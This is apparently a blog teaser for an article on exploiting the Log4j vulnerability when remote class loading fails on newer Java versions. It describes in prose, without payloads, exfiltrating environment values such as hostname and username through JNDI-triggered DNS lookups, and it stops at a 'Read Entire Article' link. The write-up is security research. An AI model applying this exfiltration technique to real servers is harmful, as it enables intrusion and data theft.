Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)

4 months ago 22

So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out at first - in most cases it all point you in the same direction…

Data exfiltration via DNS lookups: most of the time this means sending a JNDI request that resolves an environmental variable before placing it in the “subdomain” position of a URL where DNS lookups are being watched. The main three things that I got out of this were hostname, username, and java version. This…
Read Entire Article